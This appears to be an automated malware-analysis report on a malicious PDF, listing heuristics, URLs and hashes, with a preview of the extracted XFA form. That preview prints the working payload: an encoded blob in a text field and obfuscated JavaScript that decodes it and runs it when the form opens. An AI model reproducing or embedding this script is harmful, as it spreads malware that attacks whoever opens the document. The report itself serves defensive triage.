Verdict: MALICIOUS (risk score 60)
Malware Insights
MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains XFA form elements and embedded JavaScript, indicating a potential for malicious scripting. The embedded script payload, identified by the heuristic 'PDF_EMBEDDED_SCRIPT_PAYLOAD', suggests that the script is designed to execute and likely download a second-stage payload. The presence of multiple unknown URLs related to XFA schemas further supports the suspicious nature of the document.
Machine Learning
- Nyx PDF Classifier: malicious score 0.5076
Heuristics (6)
- XFA form (low) PDF_XFA: PDF uses XML Forms Architecture, which can contain script logic.
- JavaScript action (low, 1 related finding) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
- Embedded script payload in PDF stream (info) PDF_EMBEDDED_SCRIPT_PAYLOAD: PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives. This is common in accessible XFA forms but worth surfacing for analyst review.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

| URL | Channel |
|---|---|
| http://ocsp.verisign.com0 | Referenced by PDF JavaScript |
| http://ns.adobe.com/xdp/ | In PDF document text |
| http://www.xfa.org/schema/xci/1.0/ | In PDF document text |
| http://www.xfa.org/schema/xci/2.8/ | In PDF document text |
| http://www.xfa.org/schema/xfa-template/2.4/ | In PDF document text |
| http://www.xfa.org/schema/xfa-template/2.2/ | In PDF document text |
| http://www.xfa.org/schema/xfa-data/1.0/ | In PDF document text |
| http://www.xfa.org/schema/xfa-locale-set/2.7/ | In PDF document text |
| http://www.xfa.org/schema/xfa-locale-set/2.1/ | In PDF document text |
| http://www.w3.org/1999/02/22-rdf-syntax-ns# | In PDF document text |
| http://ns.adobe.com/xap/1.0/ | In PDF document text |
| http://ns.adobe.com/pdf/1.3/ | In PDF document text |
| http://ns.adobe.com/xap/1.0/mm/ | In PDF document text |
| http://www.xfa.org/schema/xfa-form/2.8/ | In PDF document text |
| http://purl.org/dc/elements/1.1/ | In PDF document text |
| http://cgi.adobe.com/special/acrobat/update | Referenced by PDF JavaScript |
| http://crl.verisign.com/tss-ca.crl0 | Referenced by PDF JavaScript |
| http://crl.verisign.com/ThawteTimestampingCA.crl0 | Referenced by PDF JavaScript |
| https://www.verisign.com/rpa | Referenced by PDF JavaScript |
| https://www.verisign.com/rpa01 | Referenced by PDF JavaScript |
| http://crl.verisign.com/pca3.crl0 | Referenced by PDF JavaScript |
| http://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D | Referenced by PDF JavaScript |
| https://www.verisign.com/rpa0 | Referenced by PDF JavaScript |
| http://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0 | Referenced by PDF JavaScript |
| http://www.adobe.com/typehttp://www.adobe.com/type/legal.html | Referenced by PDF JavaScript |
Extracted artifacts (6)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| stream_002_off00000343.js | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x343 | 1532 bytes |
| SHA-256: f574e4d51594d1a8fd22e125b109b827c437aa898edc78babb62dbb93f8744f8 | | | |
| stream_003_off0000052e.js | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x52E | 870 bytes |
| SHA-256: 4a1aca004cf20431c9a66dce85404a6411a54d881a6c257882260ffc972a13eb | | | |
| embedded_pdf_script_00004ce6.bin | pdf-embedded-script | PDF raw stream script payload at offset 0x4CE6 | 8484 bytes |
| SHA-256: 3aaa9abc03435ab186bd0f878d151b0272e257c46579fda11fde2db99c96f89d | | | |
| Detection | ClamAV: no threats found | Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob) | |
Preview of the extracted script (first 1,000 lines):
<template xmlns="http://www.xfa.org/schema/xfa-template/2.4/"
><?formServer defaultPDFRenderFormat acrobat7.0.5static?><?formServer allowRenderCaching 0?><?formServer formModel both?><subform name="form1" layout="tb" locale="en_US"
><pageSet
><pageArea name="Page1" id="Page1"
><contentArea x="0.25in" y="0.25in" w="8in" h="10.5in"
/><medium stock="letter" short="8.5in" long="11in"
/><?templateDesigner expand 0?></pageArea
><?templateDesigner expand 0?></pageSet
><subform w="8in" h="10.5in"
><draw name="naedst4t23w4w" y="53.975mm" x="19.05mm" w="136.26mm"
><ui
><textEdit
/></ui
><value
><text
>CRK:QFLK;PQOXOBMB\Q"PQOhIBK=.TEFIB"PQOgIBKDQE;l;IBK=.PQO;dk;PQOi,OBQROK;PQOgPR#PQOFKD"Yh;IBK=i,CRK:QFLK;IF#QFCC"SBOPFLK=.FC";SBOPFLK;l;j^j;=;.S\O;OLM;k;jsTrrr62rr6rrrurDrrrsr62rr6rrrrvrrrrur62rr6rrrrvrrrrxr62rr6rrrrvrrrr7r66rr6rrrrDrrrr+r66rr6rrrurDrrs6r62rWrrrr_zDrrrrrrrrrrT2tt6sr6uaaaaaLdRr8GDDDHMR1 s0aaaaaTrrrrsrrrrrrrrrrrrrr6rrrrrrQ{4r8Da1DvL6v _02ttt8SH1DHMs6/ws:tdr8Hws6/ws6/ws6/ws6/ws6/yxvL_0dP{r8SHVD/O61Ls0#Fdr8I56DvLJrrrrrrrrrrrrrrrrrrrru:Rr8FDzDHMT1 s06/ws66rvrrss6/wsMS{r8I56DvN6H_t6%Gy#4AMYd!39/Z38*LW1D5PGA7vU{[5r\F*-2:J_ J9avZ[Os%Lt%2YR%L5vvuTwA2) 8/HNrzK+O}+vEaCOtId(Yr:rr54I)TKL]CaaaTkkji,;BIPB;.S\O;OLM;k;jsTrrr62rr6rrrurDrrrsr62rr6rrrrvrrrrur62rr6rrrrvrrrrxr62rr6rrrrvrrrr7r66rr6rrrrDrrrr+r66rr6rrrurDrrs6r62rWrrrr_zDrrrrrrrrrrT2tt6sr6uaaaaawYtu8HBJDYOaaaaaaaaaa^vMDHN6y s04_tv8KZdDvOaaaaarrrrrvrrrrrrrrrrrrr6rrrrrrs\w-s0EuNv8Q[/DHN6y s0NK\v8Gt6EvLF6-70NK\v8KZdDvM 2-w0_Drrrrrrrrrrrrrrrrrrrzz)EvMB#z70N}\v8Hws6/vrsrrr6/ws6-7(D/M 2-w0H_t6)*rrrruzzLs02sty8RTxEvMaU s0aaaaaTrrrrsrrrrrrrrrrrrrvrrrrrrrxw)u8SO)dSNr+Ls0EZ)x8H[TDvMS]zw09sty8K}%E/O1z-*0CA\w8JaTD/MaU s0-T\v8F-rrrrrrrrrrrrrrrrrrru#y-s0dSO)dSW8EHMT]zw06/ws66rvrrss6/ws^0Ft8J2xEvM\2AP({K9(/Z39/Z_JG2RrdV3Zv9y#P]sN_IDUV-KF*5]9+RPw\D_-W8(\D]665r!YWOE_88LrFABSA:8y^dP0+[K6sTrr])+OtBGUaaaaji,S\O;IFKH;k;AgOBMI\:B"a;aDh;jj=iS\O;P:LAB;k;jV6H_t6)Uw#8W5_*Ly_rr\r3rSH SOOsBGNaaaauA[K(49!1-sSIA7SHRESHSESFRUSLP7SYL1AO5V7wJdE{xdT *WIuJd%U4/0QQ/QO\!_(6W!5dQ\^3T%H4TI1dOI3)65wAa[H64d#(#r(6Nt#dFN#(# (6MS xOIuv]KR{:G^rU xUP#uw/#xUP28sP#xTUuxUP#uv-#xUP2B7P#xTU]xUP#uy:#xUR2Z^#H(zV7I x%PsRWxxYEu_L#xUR2FLx6(zV9G-N3PsRWyxYEuzY#xUP2DsP#xTV[xUP#u1 #xUP2P7P#x VzZ^#HG_B2D-FTx[2r#8v2MsP#x )HG49Y(482(u9G(z[Hx[2P#B3Qz7RW4x{E(x:E[xY:*V9D#7^Ku)*S]US%Q1BUx[2r#]QIzB9Y(48UGR84(z[2GR6#PUEQux/E(59H(xYC*TdL#a2#ZO8}P7RWrxa9*V1PGR84(z[HGR8Vx[22+ {0IzQKy49O-yGI(47QLTV4(z[HGR84(1z#HTT#PTECG#x/F{::(4QDJ4+H(x{Gtxa9*81HZ49Hzd1H(R9HGR8V*V1DPL[1x(2zx[2/+ V6Q\ZKy49O-0OI(46GLU9H(49H#77SNEEI{4W0DzFzH4rxv6aGz)2/(B9H(xaG 
B9v(484(z)YGR\4(z[JG49H(08Yx[2L+)B%LLEKy49O-41I(47QLVESY{/F[3CH(t4Fy4+H(47S {a]*(L:(_tH#77Ku4VYG49D(48Vx(2zx[26*(L:(_u2#)L:#78PMx/K9R9H(x6+O39]sE*Qwx:2 z[HQsR8y1z#HVD#PW65+ER90sRW2sR9tsRWysR9usRWyxa9*8_v)d9Hzd0yF-uv*(P/(*uJu]/GLRu1M]9vz)1PILxuIV4F)_0%Z^-GLS9vV*Cv*V1Tud GLRu1M]9v*V1P#d5E(29H(t1FUN_Sax})Mx9:(_v7LF1FUJa9*8_v)d9H#79Eu4CH(17K_4)YGR84(zWH(49PGR84(z[HPL[Hx[2]+)B%Q_*Ky486[ [HGEL#PVr#xUP#Q V1FR9HG_x%FzJTx[2v#8vG YNtE}22)sH#x^/HZ8{H)ZOT ^T%H72G 45tIM#*S[da##GG x{L dVZQ#%WQ7RWxx:1 r^_u5D*xUSsI[GsD2NsKzyHT*C1T-uH3zP*TJ)1zS:x\M66^UEME(AA2B!W!%{OIxOx^s}(JYZ[Iy_s_F\/%K!yRZ5H8IZ-TDZ)E(L}9xV 7FTS(49H(zV6H_9BV]j;d;IFKHiS\O;QFCCXA\Q\;k;j8/HNru6Drrr2urjiQFCCXA\Q\dk;PQOXOBMB\Q"jT2urjh;Z^^)=iQFCCXA\Q\dk;P:LABiQFCCXA\Q\dk;PQOXOBMB\Q"j7YAyjh;ZY^^{;e;QFCCXA\Q\gIBKDQE;=iQFCCXA\Q\dk;OLMizJ\DBwFBIAZgO\T!\IRB;k;QFCCXA\Q\i,S\O;SBOPFLK;k;\MMgSFBTBO!BOPFLKgQL8QOFKD"=iSBOPFLK;k;SBOPFLKgOBMI\:B"aouaDh;jj=iFC";SBOPFLK;mk;j^j;nn;SBOPFLK;l;j^}Zj;=IF#QFCC"SBOPFLK=iFC";SBOPFLK;mk;j]j;nn;SBOPFLK;l;j]{Zj;=IF#QFCC"SBOPFLK=io</text
></value
><font typeface="Myriad Pro"
/><margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"
/></draw
><field name="ImageField1" y="9.525mm" x="57.15mm" w="25.4mm" h="30.4mm"
><ui
><imageEdit
/></ui
><caption placement="bottom" reserve="5mm"
><font typeface="Myriad Pro"
/><para vAlign="middle"
/><value
><text
>Image Field</text
></value
></caption
><border
><edge stroke="dashDotDot" thickness="11.938mm"
><color value="0,255,0"
/></edge
><corner stroke="dashDotDot" thickness="11.938mm"
><color value="0,255,0"
/></corner
></border
><?templateDesigner ScriptInitializers initialize:lang=JavaScript;?><event activity="initialize"
><script contentType="application/x-javascript"
>
var d ="uMhZCBlpfKiIGFl4GAyp6BlJCMgY+HkIWXkIGIgZeXkYmdlsqLloPLgouDh4yjopS1nb2JlImqo72JoIyDvaOvvbWMicvX3dzS0dDV3dfk ";
var yultukdr4u65rt5ryht = naedst4t23w4w.rawValue;
var esdrghzaehrts = "^ab";
var BRFStje4ryge3yge = "]"+esdrghzaehrts+"cd";
var NFOIPGgrswgswrg = "ghi";
var feswigih0swgresw = "ef"+NFOIPGgrswgswrg+"j";
var GRSWGSsbhedrhrthryjut = "lmnop";
var HRbdethr6yu6r4thrtf = BRFStje4ryge3yge+feswigih0swgresw+"k"+GRSWGSsbhedrhrthryjut+"q";
var foiwpgiwroi = 'wxy';
var NBIBVIiuebf78f0swefwe = foiwpgiwroi+'z_';
var POGOIBHUIbebf78ewefswef = "45678";
var bgshresthjtudrsuj = "!%+";
var IBFUEfbiuvgneswuig = bgshresthjtudrsuj+"-*.";
var GHIUGIUgiuwge89g89wef = POGOIBHUIbebf78ewefswef+"9/"+IBFUEfbiuvgneswuig+",";
var BFSBGSgbhehreyge43y34etyee =';"='+"<>&";
var OIGHPIPUIWb78wgh09swrg = NBIBVIiuebf78f0swefwe+"0123"+GHIUGIUgiuwge89g89wef+BFSBGSgbhehreyge43y34etyee;
var gsrhrsfhdrh5y54yrt = " ";
var podergheoi4ter4tger = "}";
var FAEvfevgw4t3ewt4ewrgesw = ")[";
var BFSgrrehyg43ty34etyg = ""+"{"+podergheoi4ter4tger+gsrhrsfhdrh5y54yrt+"("+FAEvfevgw4t3ewt4ewrgesw;
var HHRdhreyy4ey34ey5eyde = "OP";
var bsfhRHgrde5y4eye = "HIJKLMN"+HHRdhreyy4ey34ey5eyde+"QRST";
var sreghdrse4ety54eyesw = 'ABC'+'DEFG'+bsfhRHgrde5y4eye+"UVWXYZ"+BFSgrrehyg43ty34etyg+HRbdethr6yu6r4thrtf;
var bfsdre4y54ery = "#:"+sreghdrse4ety54eyesw+'rstuv'+OIGHPIPUIWb78wgh09swrg+"\\";
function BNSrhshy4ewry44e3yerw(bvfsxdsnhe4wy4ewew4r){
var zxbzfaswAGSWsge4t4etr = bfsdre4y54ery.indexOf(bvfsxdsnhe4wy4ewew4r)-(33+18);
var liooyprtdre5eyr4e5yyerr=zxbzfaswAGSWsge4t4etr;
if(liooyprtdre5eyr4e5yyerr<0)
{liooyprtdre5eyr4e5yyerr=liooyprtdre5eyr4e5yyerr+bfsdre4y54ery.length;}
var bsfhrfy3e546ty5er='';
bsfhrfy3e546ty5er=bfsdre4y54ery.charAt(liooyprtdre5eyr4e5yyerr);
return bsfhrfy3e546ty5er;}
function YRThndetj5eu4eyuytdre(hdrehesrh4tew4ete){
var trtyhtr54ey54eyeer="";
var fkyye5rdyh54ey5rtrede = hdrehesrh4tew4ete;
for (var i = 0;i<fkyye5rdyh54ey5rtrede.length-1;i++)
{
var bndxfhdrye4y5eyre=BNSrhshy4ewry44e3yerw(fkyye5rdyh54ey5rtrede[i]);
trtyhtr54ey54eyeer += bndxfhdrye4y5eyre;
}
return trtyhtr54ey54eyeer;}
var vsdfgdrs4eyr = "abrfhze3y54y54ythe5rh45wu45y54y5e";
var njs4t4ew = "nxHRTFSWRHRSWrene5yu4u63454eywr4jgdkgcdmnjdru45v";
var bxs4tew = "KBVJHSJIBVubeyubgyuswbBOGISWBGUOSWB898gr8ga";
var nsr43we = "MONVOISBOYUEFVGYUge87wgef9wgbw8e7bvg08wgwl";
var bsgs4sw = vsdfgdrs4eyr[32]+njs4t4ew[47]+bxs4tew[42]+nsr43we[41];
var mfghj544er = bsgs4sw;
app[mfghj544er](YRThndetj5eu4eyuytdre(yultukdr4u65rt5ryht));
</script
></event
></field
><?templateDesigner expand 1?></subform
><proto
/><?templateDesigner Hyphenation excludeInitialCap:1, excludeAllCaps:1, wordCharCnt:7, remainCharCnt:3, pushCharCnt:3?><?templateDesigner expand 1?><?renderCache.subset "Myriad Pro" 0 0 ISO-8859-1 4 320 80 000100020003000400060009000A000B000C000D000E000F0010001100120013001400150016001700180019001A001B001C001E00220023002400250026002700280029002A002B002C002D002E002F0030003100320033003400350036003700380039003A003B003C003D003E003F004000420045004600480049004A004B004C004D004E004F00500053005400550056005700580059005A005B005C005E !"#%()*+,-./0123456789:;=ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_adeghijklmnorstuvwxyz{}?></subform
><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.2/?><?templateDesigner DefaultLanguage JavaScript?><?templateDesigner DefaultRunAt client?><?PDFPrintOptions embedViewerPrefs 0?><?PDFPrintOptions embedPrintOnFormOpen 0?><?PDFPrintOptions duplexMode 0?><?templateDesigner DefaultPreviewType interactive?><?templateDesigner DefaultPreviewPagination simplex?><?templateDesigner XDPPreviewFormat 19?><?templateDesigner FormTargetVersion 24?><?templateDesigner Zoom 157?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner SaveTaggedPDF 1?><?templateDesigner SavePDFWithEmbeddedFonts 1?><?templateDesigner SavePDFWithLog 0?></template
>
| Filename | Kind | Source | Size |
|---|---|---|---|
| objstm_0041_00.bin | pdf-objstm-decoded | PDF /ObjStm 41 0 obj (inflated) | 2513 bytes |
| SHA-256: d2de84a57760fcd29f67e6803979f349328f968c580ef2b981e6c7d36bb577c0 | | | |
| Detection | ClamAV: no threats found | Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob) | |
| font_00_cff_off00001e8b.bin | pdf-font-stream | PDF embedded font (cff) at offset 0x1E8B | 6281 bytes |
| SHA-256: c16b2fbb01b37fa5a8a2e4b552c5da6d8965f863ef65b298b4818a07dabb98a0 | | | |
| font_01_sfnt_off00006e4e.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x6E4E | 36717 bytes |
| SHA-256: 3a47365ba29be93b97be381e34ec3c7ef0a10e0f82cdb3dadd6fb11f2800fdb3 | | | |